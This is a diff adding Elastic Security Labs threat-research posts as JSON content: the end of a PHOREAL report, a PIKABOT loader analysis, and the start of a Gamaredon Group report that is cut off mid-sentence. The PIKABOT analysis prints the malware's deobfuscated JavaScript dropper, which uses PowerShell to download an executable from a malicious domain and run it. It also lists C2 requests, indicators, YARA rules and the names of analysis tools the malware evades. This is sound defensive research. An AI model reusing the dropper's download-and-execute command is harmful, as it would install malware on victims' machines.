[https://attack.mitre.org/groups/G0050/](https://attack.mitre.org/groups/G0050/)\n\n### Observables\n\n| Indicator | Type | Reference | Notes |\n| ---------------------------------------------------------------- | ----------- | ----------- | -------------------------------------- |\n| thelivemusicgroup[.]com | domain-name | | C2 domain encrypted in malware |\n| 103.75.117[.]250 | ipv4-addr | | Resolved IP of thelivemusicgroup[.]com |\n| ec5d5e18804e5d8118c459f5b6f3ca96047d629a50d1a0571dee0ac8d5a4ce33 | SHA256 | tscon32.dll | PHOREAL dll |\n\n## Artifacts\n\nArtifacts are also available for [download](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltecdb2d74a5c6ce1b/628e88d96f81705517a1f25b/phoreal-indicators.zip) in both ECS and STIX format in a combined zip bundle.\n"
+ },
+ "title": "PHOREAL Malware Targets the Southeast Asian Financial Sector",
+ "slug": "phoreal-malware-targets-the-southeast-asian-financial-sector",
+ "date": "2023-03-02",
+ "description": "Elastic Security discovered PHOREAL malware, which is targeting Southeast Asia financial organizations, particularly those in the Vietnamese financial sector.",
+ "author": [
+ {
+ "slug": "daniel-stepanic"
+ },
+ {
+ "slug": "derek-ditch"
+ },
+ {
+ "slug": "joe-desimone"
+ },
+ {
+ "slug": "remco-sprooten"
+ },
+ {
+ "slug": "andrew-pease"
+ },
+ {
+ "slug": "cyril-francois"
+ }
+ ],
+ "image": "blog-thumb-roman-columns.jpg",
+ "category": [
+ {
+ "slug": "campaigns"
+ }
+ ],
+ "tags": [
+ "phoreal",
+ "rizzo",
+ "malware",
+ "backdoor"
+ ]
+ },
+ "id": "security_labs_content-phoreal_malware_targets_the_southeast_asian_financial_sector-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-pikabot_i_choose_you-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-pikabot_i_choose_you-md.json
new file mode 100644
index 00000000000..4bb07a167b4
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-pikabot_i_choose_you-md.json
@@ -0,0 +1,32 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"PIKABOT, I choose you!\"\nslug: \"pikabot-i-choose-you\"\ndate: \"2024-02-24\"\ndescription: \"Elastic Security Labs observed new PIKABOT campaigns, including an updated version. PIKABOT is a widely deployed loader malicious actors utilize to distribute additional payloads.\"\nauthor:\n - slug: daniel-stepanic\n - slug: salim-bitam\nimage: \"photo-edited-02.png\"\ncategory:\n - slug: campaigns\ntags:\n - pikabot\n - loader\n - syscalls\n---\n\n## PIKABOT at a glance\n\nPIKABOT is a widely deployed loader malicious actors utilize to distribute payloads such as Cobalt Strike or launch ransomware. On February 8th, the Elastic Security Labs team observed new PIKABOT campaigns, including an updated variant. This version of the PIKABOT loader uses a new unpacking method and heavy obfuscation. The core module has added a new string decryption implementation, changes to obfuscation functionality, and various other modifications.\n\n\nThis post will highlight the initial campaign, break down the new loader functionality, and review the core components. There are interesting design choices in this new update that we think are the start of a new codebase that will make further improvements over time. While the functionality is similar to previous builds, these new updates have likely broken signatures and previous tooling. \n\nDuring the development of this research, the ThreatLabz team at Zscaler released great [analysis](https://www.zscaler.com/blogs/security-research/d-evolution-pikabot) and insights into a sample overlapping with those in this post. We suggest reading their work along with ours to understand these PIKABOT changes comprehensively.\n\n### Key takeaways\n\n - Fresh campaigns involving significant updates to the PIKABOT loader and core components \n - PIKABOT loader uses a new unpacking technique of combining scattered chunks of encrypted data in base64 format from `.data` section\n - Changes in the core include toned-down obfuscation and in-line RC4 functions, plaintext configuration at runtime, removal of AES during network communications\n - PIKABOT development appears as a work-in-progress, with future updates likely imminent\n - Call-stack visibility using Elastic Security provides the ability to triage threats like PIKABOT rapidly\n\n#### PIKABOT campaign overview\n\n\n\n\nAs the new year started, PIKABOT distribution remained inactive until approximately two weeks ago. This new campaign on February 8th involved emails with hyperlinks that led to ZIP archive files containing a malicious obfuscated Javascript script. \n\n\n\n\nBelow are the contents of the obfuscated JavaScript file, showing the next sequence to download and execute PIKABOT’s loader using PowerShell.\n\n```JavaScript\n// deobfuscated\nvar sites = ['https://gloverstech[.]com/tJWz9/', '', '']\nfor (var i = 0x0; i < 3; i++)\n{\n\tvar obj = new ActiveXObject(\"WScript.Shell\")\n\tobj['Run'](\"powershell Invoke-WebRequest https://gloverstech[.]com/tJWz9/0.2343379541861872.dat -OutFile %SYSTEMDRIVE%\\\\Users\\\\Public\\\\Jrdhtjydhjf.exe; saps %SYSTEMDRIVE%\\\\Users\\\\Public\\\\Jrdhtjydhjf.exe\")\n}\n```\n\n## PIKABOT loader\n\n### Loader stage 1\n\nTo appear authentic, the developer tampered with a legitimate search and replace tool called ```grepWinNP3.exe``` from [this](https://github.com/rizonesoft/Notepad3) repository. Using our internal sandboxing project ([Detonate](https://www.elastic.co/security-labs/click-click-boom-automating-protections-testing-with-detonate)) and leveraging Elastic Defend’s [call stack feature](https://www.elastic.co/security-labs/peeling-back-the-curtain-with-call-stacks) provided a detailed trace of the execution, allowing us to pinpoint the entry point of malicious code. \n\nAn analysis of the call stack data reveals that execution begins at a call before offset ```0x81aa7``` within the malicious file; the execution then leaps to a memory allocation at a call prior to offset ```0x25d84```. Furthermore, it was observed that the process creation call stack is missing normal calls to ```KernelBase.dll!CreateProcessInternalW``` and ```ntdll.dll!NtCreateUserProcess```, due to the use of a syscall via shellcode execution residing in the [unbacked memory](https://www.elastic.co/security-labs/hunting-memory). By using this implementation, it will bypass user-mode hooks on WOW64 modules to evade EDR products. \n\n\n\n\nLooking into the offset ```0x81aa7``` of the malicious file and conducting a side-by-side code comparison with a verified, benign version of the ```grepWinNP3.exe``` file, we identified something distinct and unusual: a hardcoded address to execute the PIKABOT loader, this marks the entrypoint of the PIKABOT loader.\n\n\n\n\nThe malicious code employs heavy obfuscation, utilizing a technique where a jump (```JMP```) follows each assembly instruction. This approach significantly complicates analysis by disrupting the straightforward flow of execution.\n\n\n\n \nThe loader extracts its stage 2 payload from the ```.text``` section, where it is stored in chunks of ```0x94``` bytes, before consolidating the pieces. It then employs a seemingly custom decryption algorithm, which utilizes bitwise operations. \n\n\n\n\nThe next step of the process is to reflectively load the PE file within the confines of the currently executing process. This technique involves dynamically loading the PE file's contents into memory and executing it, without the need for the file to be physically written to disk. This method not only streamlines the execution process by eliminating the necessity for external file interactions but also significantly enhances stealth by minimizing the digital footprint left on the host system.\n\n\n\n\n### Loader stage 2\n\nThe stage 2 loader, tasked with initializing the PIKABOT core within a newly established process, employs a blend of code and string obfuscation techniques similar to those found in the core itself. In addition to its obfuscation capabilities, the loader incorporates a series of advanced anti-debugging countermeasures.\n\n#### Anti-debugging\n\nThe malware utilizes specific NTDLL ```Zw``` APIs for a variety of operations, including debugger detection, process creation, and injection, aiming to stay under the radar of detection mechanisms and evade EDR (Endpoint Detection and Response) user-land hooking, as well as debugging attempts. \n\nIt executes syscalls directly, bypassing conventional API calls that are more susceptible to monitoring and interception. It uses a wrapper function that facilitates the execution of syscalls in 64-bit mode which takes a hash of a ```Zw``` API name as a parameter.\n\n\n\n\nThe wrapper function extracts the syscall ID by parsing the loaded NTDLL and matching the hash of the ```Zw``` function name. After finding the correct syscall ID, it uses the ```Wow64Transition``` Windows API to execute the syscall in 64-bit mode.\n\n\n\n\nNote that the parameters needed are pushed on the stack before the wrapper is called, the following example showcases a ```ZwQueryInformationProcess``` call with the ```ProcessInformationClass``` set to ```ProcessDebugPort```(7):\n\n\n\n\nThe malware employs a series of anti-debugging techniques designed to thwart detection by debugging and forensic tools. These techniques include:\n - Calling ```ZwQuerySystemInformation``` with the ```SystemKernelDebuggerInformation``` parameter to detect the presence of kernel debuggers.\n - Calling ```ZwQueryInformationProcess``` with the ```ProcessInformationClass``` set to ```ProcessDebugPort``` to identify any debugging ports associated with the process.\n - Calling ```ZwQueryInformationProcess``` again, but with the ```ProcessInformationClass``` set to ```ProcessDebugFlags``` parameter, to ascertain if the process has been flagged for debugging.\n - Inspecting the Process Environment Block (PEB) for the ```BeingDebugged``` flag, which indicates if the process is currently being debugged.\n - Using ```GetThreadContext``` to detect hardware breakpoints.\nScanning the list of currently running processes to identify any active debugging or forensic tools.\n\n\n\n\nInterestingly, we discovered a bug where some of the process names it checks have their first byte zeroed out, this could suggest a mistake by the malware’s author or an unwanted side-effect added by the obfuscation tool. The full list of process names that are checked can be found at the end of this article.\n\n\n\n\n#### Execution\n\nThe loader populates a global variable with the addresses of essential APIs from the NTDLL and KERNEL32 libraries. This step is pivotal for the malware's operation, as these addresses are required for executing subsequent tasks. Note that the loader employs a distinct API name hashing algorithm, diverging from the one previously used for `Zw` APIs.\n\n\n\n\nBelow is the reconstructed structure:\n\n```C\nstruct global_variable\n{\n int debugger_detected;\n void* LdrLoadDll;\n void* LdrGetProcedureAddress;\n void* RtlAllocateHeap;\n void* RtlFreeHeap;\n void* RtlDecompressBuffer;\n void* RtlCreateProcessParametersEx;\n void* RtlDestroyProcessParameters;\n void* ExitProcess;\n void* CheckRemoteDebuggerPresent;\n void* VirtualAlloc;\n void* GetThreadContext;\n void* VirtualFree;\n void* CreateToolhelp32Snapshot;\n void* Process32FirstW;\n void* Process32NextW;\n void* ntdll_module;\n void* kernel32_dll;\n int field_48;\n uint8_t* ptr_decrypted_PIKABOT_core;\n int decrypted_PIKABOT_core_size;\n TEB* TEB;\n};\n```\nLoader structure \n\nThe malware then consolidates bytes of the PIKABOT core that are scattered in the `.data` section in base64-encoded chunks, which is noteworthy when compared to a previous version which loaded a set of PNGs from its resources section.\n\n\n\n\nIt executes a sequence of nine distinct functions, each performing similar operations but with varying arguments. Each function decrypts an RC4 key using an in-line process that utilizes strings that appear legitimate. The function then base64 decodes each chunk before decrypting the bytes.\n\n\n\n\nAfter consolidating the decrypted bytes, it uses the ```RtlDecompressBuffer``` API to decompress them.\n\n\n\n\n\nThe loader creates a suspended instance of ```ctfmon.exe``` using the ```ZwCreateUserProcess``` syscall, a tactic designed to masquerade as a legitimate Windows process. Next, it allocates a large memory region remotely via the ```ZwAllocateVirtualMemory``` syscall to house the PIKABOT core's PE file.\n\nSubsequently, the loader writes the PIKABOT core into the newly allocated memory area using the ```ZwWriteVirtualMemory``` syscall. It then redirects the execution flow from ```ctfmon.exe``` to the malicious PIKABOT core by calling the ```SetContextThread``` API to change the thread's execution address. Finally, it resumes the thread with ```ZwResumeThread``` syscall.\n\n\n\n\n## PIKABOT core\n\nThe overall behavior and functionality of the updated PIKABOT core are similar to previous versions: the bot collects initial data from the victim machine and presents the threat actor with command and control access to enable post-compromise behavior such as command-line execution, discovery, or launching additional payloads through injection. \n\nThe notable differences include:\n - New style of obfuscation with fewer in-line functions\n - Multiple implementations for decrypting strings\n - Plaintext configuration at runtime, removal of JSON format \n - Network communication uses RC4 plus byte swapping, removal of AES\n\n### Obfuscation \n\nOne of the most apparent differences is centered around the obfuscation of PIKABOT. This version contains a drastically less obfuscated binary but provides a familiar feel to older versions. Instead of a barrage of in-line RC4 functions, there are only a few left after the new update. Unfortunately, there is still a great deal of obfuscation applied to global variables and junk instructions. \n\nBelow is a typical example of junk code being inserted in between the actual malware’s code, solely to extend analysis time and add confusion. \n\n\n\n\n### String Decryption\n\nAs mentioned previously, there are still some in-line RC4 functions used to decrypt strings. In previous versions, the core used base64 encoding as an additional step in combination with using AES and RC4 to obscure the strings; in this core version, we haven’t seen base64 encoding or AES used for string decryption.\n\nHere’s an instance of a remaining in-line RC4 function used to decrypt the hardcoded mutex. In this version, PIKABOT continues its trademark use of legitimate strings as the RC4 key to decrypt data.\n\n\n\n\n\n\n\nIn this new version, PIKABOT includes a different implementation for string obfuscation by using stack strings and placing individual characters into an array in a randomized order. Below is an example using ```netapi32.dll```:\n\n\n\n\n\n### Anti-debugging\n\nIn terms of anti-debugging in this version, PIKABOT checks the ```BeingDebuggedFlag``` in the PEB along with using ```CheckRemoteDebuggerPresent```. In our sample, a hardcoded value (```0x2500```) is returned if a debugger is attached. These checks unfortunately are not in a single place, but scattered in different places throughout the binary, for example right before network requests are made.\n\n\n\n\n### Execution\n\nRegarding execution and overall behaviors, PIKABOT’s core closely follows the execution flow of older versions. Upon execution, PIKABOT parses the PEB and uses API hashing to resolve needed libraries at runtime. Next, it validates the victim machine by verifying the language identifier using ```GetUserDefaultLangID```. If the `LangID` is set to Russian (```0x419```) or Ukranian (```0x422```), the malware will immediately stop its execution.\n\n\n\n \nAfter the language check, PIKABOT creates a mutex to prevent reinfection on the same machine. Our sample used the following mutex: ```{6F70D3AF-34EF-433C-A803-E83654F6FD7C}```\n\nNext, the malware will generate a UUID from the victim machine using the system volume number in combination with the hostname and username. PIKABOT will then generate a unique RC4 key seeded by ```RtlRandomEx``` and then place the key into the config structure to be used later during its network communications.\n\n### Initial Collection\n\nThe next phase involves collecting victim machine information and placing the data into a custom structure that will then be encrypted and sent out after the initial check-in request. The following actions are used to fingerprint and identify the victim and their network:\n - Retrieves the name of the user associated with the PIKABOT thread\n - Retrieves the computer name \n - Gets processor information\n - Grabs display device information using ```EnumDisplayDevicesW```\n - Retrieves domain controller information using ```DsGetDcNameW```\n - Collects current usage around physical and virtual memory using ```GlobalMemoryStatusEx```\n - Gets the window dimensions using ```GetWindowRect``` used to identify sandbox environments\n - Retrieves Windows OS product information using ```RtlGetVersion```\n - Uses ```CreateToolhelp32Snapshot``` to retrieve process information\n\n\n\n\n### Config\n\nOne strange development decision in this new version is around the malware configuration. At runtime, the configuration is in plaintext and located in one spot in memory. This does eventually get erased in memory. We believe this will only temporarily last as previous versions protected the configuration and it has become a standard expectation when dealing with prevalent malware families. \n\n\n\n\n### Network\n\nPIKABOT performs network communication over HTTPS on non-traditional ports (2967, 2223, etc) using User-Agent ```Microsoft Office/14.0 (Windows NT 6.1; Microsoft Outlook 14.0.7166; Pro)```. The build number of the PIKABOT core module is concatenated together from the config and can be found being passed within the encrypted network requests, the version we analyzed is labeled as ```1.8.32-beta```.\n\n\n\n\nOn this initial check-in request to the C2 server, PIKABOT registers the bot while sending the previously collected information encrypted with RC4. The RC4 key is sent in this initial packet at offset (```0x10```). As mentioned previously, PIKABOT no longer uses AES in its network communications. \n\n```\nPOST https://158.220.80.167:2967/api/admin.teams.settings.setIcon HTTP/1.1\nCache-Control: no-cache\nConnection: Keep-Alive\nPragma: no-cache\nAccept: */*\nAccept-Encoding: gzip, deflate, br\nAccept-Language: en-US,en;q=0.8\nUser-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Outlook 14.0.7166; Pro)\nContent-Length: 6778\nHost: 158.220.80.167:2967\n\n00001a7600001291000016870000000cbed67c4482a40ad2fc20924a06f614a40256fca898d6d2e88eecc638048874a8524d73037ab3b003be6453b7d3971ef2d449e3edf6c04a9b8a97e149a614ebd34843448608687698bae262d662b73bb316692e52e5840c51a0bad86e33c6f8926eb850c2...\n```\n_PIKABOT initial check-in request_\n\nFor each outbound network request, PIKABOT randomly chooses one of the following URI’s:\n\n```\n/api/admin.conversations.convertToPrivate\n/api/admin.conversations.getConversationPrefs\n/api/admin.conversations.restrictAccess.removeGroup\n/api/admin.emoji.add\n/api/admin.emoji.addAlias\n/api/admin.emoji.list\n/api/admin.inviteRequests.approved.list\n/api/admin.teams.admins.list\n/api/admin.teams.settings.setIcon\n/api/admin.usergroups.addTeams\n/api/admin.users.session.reset\n/api/apps.permissions.users.list\n```\n_List of URI’s used in PIKABOT C2 requests_\n\nUnlike previous versions by which victim data was placed in a structured format using JSON, the data within these requests are raw bytes. The first 16 bytes are used to pass specific config information (bot command ID, byte shift, etc). The next 32-bytes embed the RC4 key for the session where then the encrypted data is followed in the request. \n\nThere is one additional transformation where the developers added a random shift of bytes that occurs at runtime. This number (`0x18`) at offset (`0xF`) in the example request below represents the number of bytes to shift from the end of the encrypted data to the start of the encrypted data. In our example, to successfully decrypt the data, the last 18 bytes would need to be placed in front of bytes (`0xDA 0x9E`). \n\n\n\n\n### Bot Functionality\n\nIn terms of the core bot functionality, it is similar to previous versions: executing commands, performing discovery, as well as process injection capabilities. From our perspective, it still seems very much like a work in progress. One command ID (`0x982`) is an empty function, in another case, there are three unique command ID’s pointed to the same function. These indicate that this software is not quite complete.\n\n\n| Command ID | Description |\n|------------|-------------|\n| 0x1FED | Beacon timeout |\n| 0x1A5A | Exits the PIKABOT process |\n| 0x2672 | Includes obfuscation, but appears to not do anything meaningful |\n| 0x246F | Creates file on disk and modifies registry tied to configuration |\n| 0xACB | Command-line execution with output |\n| 0x36C | PE inject in a remote process |\n| 0x792 | Shellcode inject in a remote process |\n| 0x359, 0x3A6, 0x240 | Command-line execution similar to 0xACB, uses custom error code (0x1B3) |\n| 0x985 | Process enumeration, similar to initial victim collection enumeration |\n| 0x982 | Empty function |\n\n### Malware and MITRE ATT&CK\n\nElastic uses the [MITRE ATT&CK](https://attack.mitre.org/) framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.\n\n#### Tactics\nTactics represent the _why_ of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.\n\n - [Initial Access](https://attack.mitre.org/tactics/TA0001)\n - [Execution](https://attack.mitre.org/tactics/TA0002/)\n - [Defense Evasion](https://attack.mitre.org/tactics/TA0005/)\n - [Discovery](https://attack.mitre.org/tactics/TA0007)\n - [Command and Control](https://attack.mitre.org/tactics/TA0011)\n - [Exfiltration](https://attack.mitre.org/tactics/TA0010/)\n \n#### Techniques\nTechniques represent how an adversary achieves a tactical goal by performing an action.\n\n - [Phishing](https://attack.mitre.org/techniques/T1566/)\n - [User Execution: Malicious Link](https://attack.mitre.org/techniques/T1204/001/)\n - [Reflective Code Loading](https://attack.mitre.org/techniques/T1620/)\n - [System Information Discovery](https://attack.mitre.org/techniques/T1082/)\n - [Process Injection](https://attack.mitre.org/techniques/T1055/)\n - [Encrypted Channel](https://attack.mitre.org/techniques/T1573/)\n\n## Detecting malware\n\n### Prevention\n\n - [Network Module Loaded from Suspicious Unbacked Memory](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_network_module_loaded_from_suspicious_unbacked_memory.toml)\n - [Shellcode Execution from Low Reputation Module](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_shellcode_execution_from_low_reputation_module.toml)\n - [Suspicious Memory Write to a Remote Process](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_suspicious_memory_write_to_a_remote_process.toml)\n - [Suspicious Remote Memory Allocation](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_suspicious_remote_memory_allocation.toml)\n - [Process Creation with Unusual Mitigation](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_process_creation_with_unusual_mitigation.toml)\n - [Windows.Trojan.PikaBot](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_PikaBot.yar)\n\n#### YARA\n\nElastic Security has created YARA rules to identify this activity. Below are YARA rules to identify [PIKABOT](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_PikaBot.yar):\n\n```\nrule Windows_Trojan_Pikabot_5441f511 {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2024-02-15\"\n last_modified = \"2024-02-15\"\n license = \"Elastic License v2\"\n description = \"Related to PIKABOT core\"\n os = \"Windows\"\n arch = \"x86\"\n threat_name = \"Windows.Trojan.PIKABOT\"\n\n strings:\n $handler_table = { 72 26 [6] 6F 24 [6] CB 0A [6] 6C 03 [6] 92 07 }\n $api_hashing = { 3C 60 76 ?? 83 E8 20 8B 0D ?? ?? ?? ?? 6B FF 21 }\n $debug_check = { A1 ?? ?? ?? ?? FF 50 ?? 50 50 80 7E ?? 01 74 ?? 83 7D ?? 00 75 ?? }\n $checksum = { 55 89 E5 8B 55 08 69 02 E1 10 00 00 05 38 15 00 00 89 02 5D C3 }\n $load_sycall = { 8F 05 ?? ?? ?? ?? 83 C0 04 50 8F 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 04 A3 ?? ?? ?? ?? 31 C0 64 8B 0D C0 00 00 00 85 C9 }\n $read_xbyte_config = { 8B 43 04 8B 55 F4 B9 FC FF FF FF 83 C0 04 29 D1 01 4B 0C 8D 0C 10 89 4B 04 85 F6 ?? ?? 89 16 89 C3 }\n condition:\n 2 of them\n}\n\nrule Windows_Trojan_Pikabot_95db8b5a {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2024-02-15\"\n last_modified = \"2024-02-15\"\n license = \"Elastic License v2\"\n description = \"Related to PIKABOT loader\"\n os = \"Windows\"\n arch = \"x86\"\n threat_name = \"Windows.Trojan.PIKABOT\"\n\n strings:\n $syscall_ZwQueryInfoProcess = { 68 9B 8B 16 88 E8 73 FF FF FF }\n $syscall_ZwCreateUserProcess = { 68 B2 CE 2E CF E8 5F FF FF FF }\n $load_sycall = { 8F 05 ?? ?? ?? ?? 83 C0 04 50 8F 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 04 A3 ?? ?? ?? ?? 31 C0 64 8B 0D C0 00 00 00 85 C9 }\n $payload_chunking = { 8A 84 35 ?? ?? ?? ?? 8A 95 ?? ?? ?? ?? 88 84 1D ?? ?? ?? ?? 88 94 35 ?? ?? ?? ?? 02 94 1D ?? ?? ?? ?? }\n $loader_rc4_decrypt_chunk = { F7 FF 8A 84 15 ?? ?? ?? ?? 89 D1 8A 94 1D ?? ?? ?? ?? 88 94 0D ?? ?? ?? ?? 8B 55 08 88 84 1D ?? ?? ?? ?? 02 84 0D ?? ?? ?? ?? 0F B6 C0 8A 84 05 ?? ?? ?? ?? 32 04 32 }\n condition:\n 2 of them\n}\n```\n\n## Observations\n\nAll observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/pikabot) in both ECS and STIX format.\n\nThe following observables were discussed in this research.\n\n| Observable | Type | Name | Reference |\n|------------|-------------|-------------|-------------|\n| `2f66fb872c9699e04e54e5eaef982784b393a5ea260129a1e2484dd273a5a88b` | SHA-256 | `Opc.zip` | Zip archive holding obfuscated Javascript |\n| `ca5fb5814ec62c8f04936740aabe2664b3c7d036203afbd8425cd67cf1f4b79d`| SHA-256 | `grepWinNP3.exe` | PIKABOT loader |\n| `139.84.237[.]229:2967` | ipv4-addr | | PIKABOT C2 server |\n| `85.239.243[.]155:5000` | ipv4-addr | | PIKABOT C2 server |\n| `104.129.55[.]104:2223` | ipv4-addr | | PIKABOT C2 server |\n| `37.60.242[.]85:9785` | ipv4-addr | | PIKABOT C2 server |\n| `95.179.191[.]137:5938` | ipv4-addr | | PIKABOT C2 server |\n| `65.20.66[.]218:5938` | ipv4-addr | PIKABOT C2 server |\n| `158.220.80[.]157:9785` | ipv4-addr | PIKABOT C2 server |\n| `104.129.55[.]103:2224` | ipv4-addr | PIKABOT C2 server |\n| `158.220.80[.]167:2967` | ipv4-addr | PIKABOT C2 server |\n| `entrevientos.com[.]ar` | domain | | Hosting infra for zip archive |\n| `gloverstech[.]com` | domain | | Hosting infra for PIKABOT loader |\n\n## References\n\nThe following were referenced throughout the above research:\n - [https://www.zscaler.com/blogs/security-research/d-evolution-PIKABOT](https://www.zscaler.com/blogs/security-research/d-evolution-pikabot)\n - [https://x.com/Cryptolaemus1/status/1755655639370514595?s=20](https://x.com/Cryptolaemus1/status/1755655639370514595?s=20)\n\n## Appendix\n\n```\nProcess Name Checks\ntcpview.exe\nfilemon.exe\nautoruns.exe\nautorunsc.exe\nProcessHacker.exe\nprocmon.exe\nprocexp.exe\nidaq.exe\nregmon.exe\nidaq64.exe\n\n\nx32dbg.exe\nx64dbg.exe\nFiddler.exe\nhttpdebugger.exe\ncheatengine-i386.exe\ncheatengine-x86_64.exe\ncheatengine-x86_64-SSE4-AVX2.exe\n\n\nPETools.exe\nLordPE.exe\nSysInspector.exe\nproc_analyzer.exe\nsysAnalyzer.exe\nsniff_hit.exe\nwindbg.exe\njoeboxcontrol.exe\njoeboxserver.exe\nResourceHacker.exe\n\n\nImmunityDebugger.exe\nWireshark.exe\ndumpcap.exe\nHookExplorer.exe\nImportREC.exe\n```"
+ },
+ "title": "PIKABOT, I choose you!",
+ "slug": "pikabot-i-choose-you",
+ "date": "2024-02-24",
+ "description": "Elastic Security Labs observed new PIKABOT campaigns, including an updated version. PIKABOT is a widely deployed loader malicious actors utilize to distribute additional payloads.",
+ "author": [
+ {
+ "slug": "daniel-stepanic"
+ },
+ {
+ "slug": "salim-bitam"
+ }
+ ],
+ "image": "photo-edited-02.png",
+ "category": [
+ {
+ "slug": "campaigns"
+ }
+ ],
+ "tags": [
+ "pikabot",
+ "loader",
+ "syscalls"
+ ]
+ },
+ "id": "security_labs_content-pikabot_i_choose_you-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-playing_defense_against_gamaredon_group-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-playing_defense_against_gamaredon_group-md.json
new file mode 100644
index 00000000000..62157043dfe
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-playing_defense_against_gamaredon_group-md.json
@@ -0,0 +1,33 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Playing defense against Gamaredon Group\"\nslug: \"playing-defense-against-gamaredon-group\"\ndate: \"2022-06-21\"\ndescription: \"Learn about the recent campaign of a Russia-based threat group known as Gamaredon Group. This post will review these details and provide detection strategies.\"\nauthor:\n - slug: daniel-stepanic\n - slug: andrew-pease\n - slug: seth-goodwin\n - slug: elastic-security-intelligence-analytics-team\nimage: \"blog-thumb-digital-shield.jpg\"\ncategory:\n - slug: activity-group\n---\n\nFor several months, the Intelligence & Analytics team at Elastic Security has tracked an ongoing adversary campaign appearing to target Ukranian government officials. Based on our monitoring, we believe [Gamaredon Group](https://attack.mitre.org/groups/G0047/), a suspected Russia-based threat group, is behind this campaign. Our observations suggest a significant overlap between tactics, techniques, and procedures (TTPs) included within this campaign and [public reporting](https://www.anomali.com/resources/whitepapers/malicious-activity-aligning-with-gamaredon-ttps-targets-ukraine)1.\n\nThis campaign has produced and deployed updated lures on a near-daily basis that appear to target multiple Ukrainian government departments. With this high operational tempo and aggressive targeting, they consistently employ a cluster of initial access techniques and procedures. Over the past four months, these techniques have consisted of spearphishing, remote document template injection, startup folder persistence, VBA/VBScript languages, and Dynamic DNS command & control infrastructure.\n\nIn this post, we’ll walk through the campaign details, reviewing the implementation while also providing solutions such as detection strategies through the use of Elastic’s [Event Query Language (EQL)](https://www.elastic.co/blog/introducing-event-query-language).\n\n## Campaign Details\n\nThe earliest identified [infrastructure](https://www.virustotal.com/gui/domain/libre-templates.ddns.net/details) indicates this campaign has been active since August 2019. The first [sample](https://www.virustotal.com/gui/file/481eee236eadf6c947857820d3af5a397caeb8c45791f0bbdd8a21f080786e75/details) leveraging this domain was submitted to VirusTotal in early September 2019. Spearphishing emails like the example in Figure 1 (below) were used to deliver a malicious attachment and demonstrate Gamaredon Group’s attempt to impersonate an anti-corruption activist. This example targeted the National Security and Defense Council of Ukraine and dates to January 17, 2020.\n\n\n\n_Figure 1 - Spearphishing email sent to National Security and Defense Council of Ukraine_\n\nA typical lure document might masquerade as an information request to the Ministry of Foreign Affairs of Ukraine. These manufactured lures included official logos stolen from governmental offices of Ukraine and impersonated diplomats known to their targets.\n\n\n\n_Figure 2 - Lure document - Ministry of Foreign Affairs in Ukraine request_\n\nTo improve their chances of success, they customize the request around the same date of the campaign and include urgent requests for action. These efforts are indicative of necessity.\n\n\n\n_Figure 3 - Lure document - Information request related to NSDC Head of Ukraine_\n\nOften, the call to action first required the victim to open an attached lure document. A user who attempted to open one of these malicious attachments would see a perfectly convincing decoy document, while a sequence of invisible actions occurred behind the screen. These documents end up leveraging a technique known as [template injection](https://attack.mitre.org/techniques/T1221/), a method of loading remotely hosted Microsoft Word document templates.\n\nMicrosoft Word objects function similarly to compressed archives and have properties defined using Microsoft’s Open Office XML (OOXML) format. Within the decompressed word/\\_rels/ subdirectory, the file settings.xml.rels contained a network location where a remotely hosted template was retrieved as depicted in Figure 4.\n\n\n\n_Figure 4 - Excerpt from Settings.xml.rels_\n\nEach external URL within these lures were configured to point to Dynamic DNS providers (ddns.net, hopto.org). Dynamic DNS provides automation around updating a name server in the Domain Name System (DNS). By adopting this technique, this shows the adversary’s attempt to mask their ownership and obscure atomic indicator associations through the use of transient infrastructures, such as Dynamic DNS.\n\n\n\n_Figure 5 - Word startup screen showing download of remote document template_\n\nThe remote templates are macro-enabled, configured to execute VBA macro code that persists a VBScript object in the victim’s startup folder as a foothold. We assess the objective of this initial code is used to identify the victim and to protect the second-stage payload that is intended only for their targeted victims. In the next sections, we will review the document’s metadata and macro code found in a recent [sample](https://www.virustotal.com/gui/file/feb0596e9735e03ae929d9b5ee862da19e16e5cdf57dd2a795205e591a55940f/details).\n\n## Document metadata analysis\n\nIn malicious campaigns, infrastructure is commonly created for specific targets. This serves multiple purposes, but frequently it’s done to track implants and frustrate automated research and analysis. As analysts, this gives us some insight into the adversaries’ maturity, experience, and resources. As an example, an adversary who reuses lure documents or templates may be less experienced, not interested in high-value targets, or using monetized infrastructure from previous campaigns.\n\nAnalyzing the metadata from the lure document and template allows us to see when these weaponized documents were created, as well as identify any associations between different elements of the campaign.\n\nAs we can see in Figure 6, the lure document was created on December 24, 2019 by the Author “ШУРИК”. In Figure 7, we can see that the Author is the same as observed in the lure document (ШУРИК). Additionally, we can see that the remote template was created on December 12, 2019 and then modified on December 24, 2019. There were 5 modifications to it, indicating that it has been used for 5 campaigns in 12 days — or about 2.5 days per campaign. With moderate confidence, this tells us that the remote template is likely reused and updated with new macros for new campaigns, and that they were created by the same Author (or at a minimum, the same instance of Microsoft Word).\n\nAs an analyst note, we see different tool markings that indicate this was created by 